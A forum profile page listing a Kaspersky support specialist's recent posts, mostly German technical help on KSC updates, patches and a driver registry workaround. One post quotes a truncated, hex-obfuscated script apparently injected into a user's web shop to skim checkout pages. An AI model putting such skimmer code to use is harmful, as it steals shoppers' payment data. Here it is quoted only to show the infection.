Jump to content

hawk

KL Germany
  • Content count

    273
  • Joined

  • Last visited

About hawk

  • Rank
    Support specialist

Contact Methods

  • E-mail
    0

Recent Profile Visitors

25,559 profile views
  1. Sobald auf dem KSC neue Updates vorhanden sind, werden diese auf den Client geschoben. Wenn in dieser Zeit beispielweise ein Update Task läuft während die Updates noch kopiert werden, kriegt er Client noch die vorherigen Updates. Erst wenn das kopieren komplett abgeschlossen ist, kann der Client darauf zugreifen. Ich werde einen FAQ Artikel dazu erstellen lassen, da die Funktion doch sehr Umfangreich ist. Das ganze nennt sich "Offline Updates". gruss hawk
  2. HI Penny, ja der Informationsgehalt meines Postes war auch mehr als dürftig. Ich versuchs mal zu erklären: 1. Wenn der Haken nicht gesetzt ist werden nur die Updates an die Netzwerk Agenten übertragen, die vom Administrator “approved” wurden. Ist der Haken gesetzt werden automatische alle Updates übertragen. 2. Kannst du dir als eine Art "Offline Update" (Systemmanagement aber auch KES Patche % Bases) vorstellen. Hier werden Die Updates bereits auf die Rechner kopiert ohne das der Task gestartet wird. Wenn der Task dann gestartet wird, liegen die Updates schon temporär auf den Clients und werden von dort geladen. Bei einer Update Agent Konfiguration fungiert dieser dann wieder als "Proxy" und die Updates werden über diesen bezogen und nicht vom KSC. gruss hawk
  3. Hallo Alex, vielleicht hilft dir der englische Text weiter der deutschsprachige Text klingt leider sehr unverständlich.
  4. Doch den gibts noch Berechtigungen sind in Arbeit, manchmal dauerts halt länger. Das FOrum ist als User Forum gedacht und nicht als offizielles Support Medium. Die Kollegen haben das Forum früher nebenbei noch mitbetreut, das ist zur Zeit aber zeitlich nicht möglich. Ich hab das Thema schon intern angesprochen und man wird sehen wie man hier weiter vorgehen wird. gruss hawk
  5. Sorry but your side is actually infected. <script> var _0x20f1=["\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x65\x73\x74","\x6F\x6E\x65\x70\x61\x67\x65\x7C\x63\x68\x65\x63\x6B\x6F\x75\x74\x7C\x6F\x6E\x65\x73\x74\x65\x70\x63\x68\x65\x63\x6B\x6F\x75\x74\x7C\x6F\x6E\x65\x70\x61\x67\x65\x63\x68\x65\x63\x6B\x6F\x75\x74\x7C\x66\x69\x72\x65\ ... snd=null;setTimeout(_0x20f1[40],140);} </script>
  6. DB directMC + Kaspersky blockt

    Hallo Hermann, schick mir doch mal bitte umgehend die Ticketnummern per PM zu. Ich prüfe sofort warum du hier seit angeblich 2 Monaten keine Antwort erhalten hast. gruss hawk
  7. Hallo Tom, kannst du noch gegen testen. Auch von den anderen Usern und Testern haben wir positives Feedback bekommen. Daher hab ich es jetzt auch gepostet. gruss hawk
  8. Hallo Zusammen, das Problem wurde mit dem PF366 gefixt. Bitte beim Support den Patch anfordern. Der Patch muss direkt nach der KES Installation noch vor dem ersten Neustart installiert werden. Gruss hawk
  9. genau tom, nach den Informationen die ich habe wird ein eigener Patch erstellt der diese Datei dann ersetzen wird. Ich melde mich über das Ticket sobald ich weitere Informationen habe @alexcad; bitte mal erst den Novell Client installieren. Bei unseren Tests hat die Installationsreihenfolge schon ohne den Patch das Ergebnis komplett verändert. Update* also nun mit 100%iger Sicherheit, Patch 338 löst nicht das Novell Client Problem ! An einer Lösung wird derzeit noch gearbeitet. gruss hawk
  10. Hallo zusammen @alexcad; Patch 338 löst nicht das Novell Client Problem, hast du es getestet und bist zu einem anderen Resultat gekommen? Der eigentliche Patch für das Novell Problem ist in Arbeit. gruss hawk
  11. Hallo Zusammen, wie es aussieht hängt das Problem im Zusammenhang mit unserem klvfs Treiber zusammen. Um das System zum Laufen zu kriegen sollte der Wert auf 4=disabled gestellt werden. Es funktioniert dann zwar auch keine Verschlüsselung aber der Client sollte normal hochfahren. Bitte mal prüfen. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\klvfs Startwert 4 Sobald es weitere Infos gibt, werde ich diese posten.
  12. Websperre geht zu umgehen!!

    Weil es bei älteren(Versionen) oder mehrfach konvertierten Richtlinien zu Problemen kommen kann. Muss nicht, kann.
  13. Hast neugestartet oder Dienst wurde durchgestartet
×